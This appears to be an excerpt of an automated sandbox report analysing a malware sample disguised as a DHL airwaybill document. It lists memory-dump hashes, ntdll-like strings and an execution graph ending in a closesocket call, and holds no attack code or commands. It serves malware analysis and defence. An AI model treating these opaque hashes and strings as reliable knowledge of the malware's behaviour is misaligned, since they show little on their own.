                • Instruction Fuzzy Hash: CDF0B472610204AFE728EF25CD01F56B6E9EFE8344F1580B8A545D7164FBB0DD11D694
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b01b74cb7a51a39eb66962e36d0b10207914d710af1684f7937480bc5ee6dbcd
                • Instruction ID: 67efb301e1fd5f557a7f1848e3cf2b9bc28aa84005ede41706ac44942a0f166b
                • Opcode Fuzzy Hash: b01b74cb7a51a39eb66962e36d0b10207914d710af1684f7937480bc5ee6dbcd
                • Instruction Fuzzy Hash: E6F0AF70A00209AFCB08EFA9C555A9EBBF4EF18300F008099B845EB395DB34EA01CB60
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 458f1ac54301ce49f45fd9091f10fce01df31ca239ee3398d56d38b50881a4bf
                • Instruction ID: 475082f312b58f6296d701e069d59425a025a634f3eb62571e5098f6f15a4671
                • Opcode Fuzzy Hash: 458f1ac54301ce49f45fd9091f10fce01df31ca239ee3398d56d38b50881a4bf
                • Instruction Fuzzy Hash: C7F0B4719167D19FE73BDB6CC044B21BFD4EB00632F094DEAD74987582D7A4DA80C650
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 807a3661040e9f6d313f72bb592d247aa9062f2125e2be9d53159d6bdf1fd15f
                • Instruction ID: c7adfc61254374da9974d16796cdd14d1b7dccc5ae8d03a5620e416c3a71a99e
                • Opcode Fuzzy Hash: 807a3661040e9f6d313f72bb592d247aa9062f2125e2be9d53159d6bdf1fd15f
                • Instruction Fuzzy Hash: BDF0272A41668086CF3A7F2C68903E5AB54E795A10F0910CDF9A157605C7B88883C320
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4d6fa4fb429a95fa1669235572f23993e728311f44616e4b81dddaaa8e1de17b
                • Instruction ID: f2cbd375cd5b03053bf726fbe161748417548185fc18a73fdec3daefddd231f5
                • Opcode Fuzzy Hash: 4d6fa4fb429a95fa1669235572f23993e728311f44616e4b81dddaaa8e1de17b
                • Instruction Fuzzy Hash: 94F052714016809FE72E8BACC508B11BFD8DB807A0F08A5EBF40297522C730E8A0DA40
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                • Instruction ID: ff10f93027c823f80e61e8d06439620b6e5e95355ad6d82e7399821cdabe0c6e
                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                • Instruction Fuzzy Hash: 47E0D8323006016BEB269E599CC0F477B6EDFD7B10F0540F9B5045F251CBE2DC0996A4
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                • Instruction ID: 6669a97db74a326a1c92dd82d5e655859902d6df846bed0b5e33d7ca732e3d10
                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                • Instruction Fuzzy Hash: 5CF0A0721002049FE7288F09DDC0F52BBF8EB09364F42C0B6E6088B160D339EC41CBA0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                • Instruction ID: 5480d641c6dd341867f688b6199d7eed3aa0686e15129b9da5027e0196bf3fa7
                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                • Instruction Fuzzy Hash: DDF0A0393047429BDB1EDF19D080BA57BE4FB413A0B0000D4FC428B351E735E981CB50
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                • Instruction ID: cdebb88ef663a42434476ad6f7621ea766a357bc72f42e4cbbc0bcfc6b626e35
                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                • Instruction Fuzzy Hash: 60E0D833244145ABD7391A598800B667BA9EBD17A0F160469E2008B150DB70DC52C7D8
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5605fb522ab9e791947c1d8ff1aae41c7af77d01658da6991a6924782a5cf5c7
                • Instruction ID: 914705585cf7f3bd43e37b4e605c36e06248fc212ee847eaa096f011d183e950
                • Opcode Fuzzy Hash: 5605fb522ab9e791947c1d8ff1aae41c7af77d01658da6991a6924782a5cf5c7
                • Instruction Fuzzy Hash: 6AF0A931A26A918FEB6ED73DE280B567BE0EB10620F4A05E4D4118BD12E334EC80C650
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                • Instruction ID: cd915ca5b698172ed195f4547fa1eeff430247e852f5979ef8366e2c0a4b1585
                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                • Instruction Fuzzy Hash: 0FE0DF72A00120BBDF259799CD05F9ABFACDB90FA0F490094BA00E70E0E630DE00C6D0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                • Instruction ID: bb3d1387c9f84bd4abeb04a4c1d67591d7fbfdc8e2f6cc66a05752354887edf8
                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                • Instruction Fuzzy Hash: 3CE09B316417508BCB2DAA1DC141A53BFE8DF95660F1580EDE90547612E332F842C6D0
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: ee099320da3b5753486709b03547564ad69634c7dae647086916f70439d1fab1
                • Instruction ID: 2dadcee0022683d6f31e17ee5ac388d458c262aba0bfb46f58853ce67d8bcaf6
                • Opcode Fuzzy Hash: ee099320da3b5753486709b03547564ad69634c7dae647086916f70439d1fab1
                • Instruction Fuzzy Hash: 6FE09232100A54ABCB26BF29DD01F8A7B9AEB60360F014569F115571A0CB30A810C784
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a69c7372dd78b928aee5d31cef27a3833dc27c90b9780fed08f1bc2f66463bc
                • Instruction ID: 76f80ab457bb6636cbc7b863d25ca0ad04b6803d051b63eb7d6452e3bde8309d
                • Opcode Fuzzy Hash: 8a69c7372dd78b928aee5d31cef27a3833dc27c90b9780fed08f1bc2f66463bc
                • Instruction Fuzzy Hash: FB90022230140402D246725944147060009D7D1345F95C052F5424556DC7258A53A632
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 163dce6dd38e2bbe033060fd5f1bb793e9bd6524a46d18a1077d8a92f1ce9dee
                • Instruction ID: dd8eb38d41f9ec87b2a35e8d6acfcc37069150832580c80ac68ab5f29cc5b27c
                • Opcode Fuzzy Hash: 163dce6dd38e2bbe033060fd5f1bb793e9bd6524a46d18a1077d8a92f1ce9dee
                • Instruction Fuzzy Hash: 0E90022224140802D284725984147070006D7D0601F55C051B4024555DC7168A656BB1
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eadd22bf6cb660cdf34b5248e187d2e335ced30f2476fcf18dd28da0369d819c
                • Instruction ID: d858beaedcf1ca850d185d6fff45ae2e4c65e117d66d805651363d226319c09e
                • Opcode Fuzzy Hash: eadd22bf6cb660cdf34b5248e187d2e335ced30f2476fcf18dd28da0369d819c
                • Instruction Fuzzy Hash: 4490022220184442D28473594804B0F410597E1202F95C059B8156555CCA1589555B21
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c93677e85dc62e3ff784f1e0ddddb9bdbb0252a2d7ef7835246a5939fcdde7fc
                • Instruction ID: 81cbef462a6c05fbb70981f8528c88c366b878303d93425a5031bb32715e63d5
                • Opcode Fuzzy Hash: c93677e85dc62e3ff784f1e0ddddb9bdbb0252a2d7ef7835246a5939fcdde7fc
                • Instruction Fuzzy Hash: 0B90022224545102D294725D44047164005B7E0201F55C061B4814595DC65589556721
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10f613ee041d0f085d07c56bc6f7c12b0b914b81a8956e53452f4cb8d35b0f1a
                • Instruction ID: 20964afcc76afe556c9addd7f8424d11a5d5d788aabe8b6b1171fc073d75bddd
                • Opcode Fuzzy Hash: 10f613ee041d0f085d07c56bc6f7c12b0b914b81a8956e53452f4cb8d35b0f1a
                • Instruction Fuzzy Hash: 8690023220240142968473595804B4E410597E1302B95D455B4015555CCA1489615721
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fa57b659d381a53ccd4d07d546f0736e89c56db03e011f1c1f4808eea646a4b6
                • Instruction ID: dcf24c892999adbd624567d2709c77bb3759e2c6380beb21e3ea90051a4816bf
                • Opcode Fuzzy Hash: fa57b659d381a53ccd4d07d546f0736e89c56db03e011f1c1f4808eea646a4b6
                • Instruction Fuzzy Hash: E990023620140402D65472595804746004697D0301F55D451B4424559DC75489A1A621
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction ID: 4d13e486dc2bd990de5e3d63ff7ffa620d061ba184aadb7f8f3fc952e16730a2
                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction Fuzzy Hash:
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 01afa993284d20a85fc68ea295a61d2d5f07c4a621a7ea70d9c13bb1148ef31f
                • Instruction ID: c643fc28bacd0ac04c0143d8bfa937704898d0efd9a105d98029d1d3b0a2be4c
                • Opcode Fuzzy Hash: 01afa993284d20a85fc68ea295a61d2d5f07c4a621a7ea70d9c13bb1148ef31f
                • Instruction Fuzzy Hash: BB51B3A6A00116BFDF19DBAC989097EFBB8FF48240714C2E9F565D7642D334DE40A7A0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 8bacc9b2e67e5e83903712810578d954d02028f4787ebb9211f31c3b51c0a46e
                • Instruction ID: e4c853d8ded35976c4f1721bf023311dcb21d09a01443e3be88fd2a7fe3ad15d
                • Opcode Fuzzy Hash: 8bacc9b2e67e5e83903712810578d954d02028f4787ebb9211f31c3b51c0a46e
                • Instruction Fuzzy Hash: EA51D475A00645AEDF29DF9CC8D09BFBBB8EF44200B0485D9F596D7A41E7B8EA40C760
                Strings
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01B74787
                • ExecuteOptions, xrefs: 01B746A0
                • Execute=1, xrefs: 01B74713
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B746FC
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B74742
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B74725
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B74655
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: 672ded435d8c800b0915ebfac46155eb129c3505fce21928462876dbde135848
                • Instruction ID: cbcd065598bf876a5a1636f0c28434d0283e4d6463d357e17e17c13dea08252a
                • Opcode Fuzzy Hash: 672ded435d8c800b0915ebfac46155eb129c3505fce21928462876dbde135848
                • Instruction Fuzzy Hash: E95138B160021ABBEF29ABA8DC99FB977A8EF54300F0400EDE605A7181DB719A55DF50
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction ID: ea3587c3405e738853d33ca0fac2c501efc1b0f03fbbfbdb3c1c3ad2edb54046
                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction Fuzzy Hash: A3021771508342AFD70DCF19C490A6BBBE5EFC8704F448AADF9898B254EB31E945CB52
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: 2e7df6340701aa5ee184e9e4e6a11225916113b16cd9d9a59ffd046de3c895a8
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: 6D81A170A052499FEF2DCF6CC6517BEBBB2EF45320F18C299EA51A7291C734D840AB51
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: ea337a0447258d2b5b223e923f5855b27c3aa0ec8fb704d1b0e9317aa2ec5fa3
                • Instruction ID: 573ba50b761982f1c9a8c6dd55ab4905216b2e1a46dc5923a6ecd60c7a949a86
                • Opcode Fuzzy Hash: ea337a0447258d2b5b223e923f5855b27c3aa0ec8fb704d1b0e9317aa2ec5fa3
                • Instruction Fuzzy Hash: 0D21677AA00119ABDB14DF7ADC81AFE7BF8EF54640F040199EA05D3600E770E9029791
                Strings
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B702E7
                • RTL: Re-Waiting, xrefs: 01B7031E
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B702BD
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: 128e7ab47449c425b05812ada928ff077b3ff605284bb85702ab608b4bdcb4df
                • Instruction ID: 0edf7fbc50532fadda0986d45a1bf53203d2116341abc02ffd49918669349e09
                • Opcode Fuzzy Hash: 128e7ab47449c425b05812ada928ff077b3ff605284bb85702ab608b4bdcb4df
                • Instruction Fuzzy Hash: C6E1BF316047519FDB29DF28C884B2ABBF0FB49714F144A9EF5A98B2E1D774D848CB42
                Strings
                • RTL: Resource at %p, xrefs: 01B77B8E
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B77B7F
                • RTL: Re-Waiting, xrefs: 01B77BAC
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: aec045de3dbb396a608d1c6fcbeb42362a0ba73a7f113294543c5517fe937ecb
                • Instruction ID: cbd7d1a32ec2491ed12f0060d93be73f95ca5daa999d0542cb7a536dfe8b9073
                • Opcode Fuzzy Hash: aec045de3dbb396a608d1c6fcbeb42362a0ba73a7f113294543c5517fe937ecb
                • Instruction Fuzzy Hash: 0841D6313047029FDB29EE29C950B6AB7E5EF94710F100A9DFA5AD7780DB31E415CB91
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B7728C
                Strings
                • RTL: Resource at %p, xrefs: 01B772A3
                • RTL: Re-Waiting, xrefs: 01B772C1
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B77294
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: 2b70d4f6e5c4e208a49708921a916523dfc0bf2a5142dd8bbe4baa3eb23a9811
                • Instruction ID: fd65dd855822fa455444a059ab7e6221a636c53026f6461256894a8cf27816fd
                • Opcode Fuzzy Hash: 2b70d4f6e5c4e208a49708921a916523dfc0bf2a5142dd8bbe4baa3eb23a9811
                • Instruction Fuzzy Hash: F0411131700206ABDB29DE29CD45F6AB7A5FF95710F10069DF965EB280DB30E816CBD1
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: f3246c4d3d7f9ccbe66293f402ee158eedbc9594d00deba0c87ec4437deb474d
                • Instruction ID: 2a482be0a3b11b286de07df789e5e9d1bfeb84607242d27067ebe95e40996053
                • Opcode Fuzzy Hash: f3246c4d3d7f9ccbe66293f402ee158eedbc9594d00deba0c87ec4437deb474d
                • Instruction Fuzzy Hash: 98318472A012199FDB24DF29DCC0BFE77B8EF44610F4445D9E949E3600EB70AA458BA0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: 1727f62da5c6925de8dc403a4adaf1eb2c1045388148c8f44858c6a1af4d7197
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 0191C470E002569BDF2CDF6DC8806BEBBA5EF44320F14C69AE955A72C0DF309940E751
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: 084f6f91f90d6b23cc5b82b200e09acbdbb32ca40b06f81720051c8b333c15c8
                • Instruction ID: 3e4382306f753b1be3b60a78b320a696f948868337b49a3d790359869cf07f5b
                • Opcode Fuzzy Hash: 084f6f91f90d6b23cc5b82b200e09acbdbb32ca40b06f81720051c8b333c15c8
                • Instruction Fuzzy Hash: 23810C71D012699BDB39DF54CC44BEABBB8AB18754F0041EAEA1DB7280D7745E84CFA0
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 01B8CFBD
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: 534e086422c349b70f47e1f4f887a080612709574ab9b73da710f9dc5b7d0da4
                • Instruction ID: b82017b45417bdf4b2c3988329eb75e656a6b15903d3d3351657f2dbb7a51798
                • Opcode Fuzzy Hash: 534e086422c349b70f47e1f4f887a080612709574ab9b73da710f9dc5b7d0da4
                • Instruction Fuzzy Hash: 2441A371900215DFDB29AF99C850AADBBF8FF59B50F1041AEEA05EB264D730D805CB61

                Execution Graph

                Execution Coverage:3.1%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:3
                Total number of Limit Nodes:0
                execution_graph 16928 5fa6590 16929 5fa65ad 16928->16929 16930 5fa65bc closesocket 16929->16930

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 9 5fa6590-5fa65ca call 5f7e440 call 5fa7190 closesocket
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 05F20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_5f20000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID: closesocket
                • String ID:
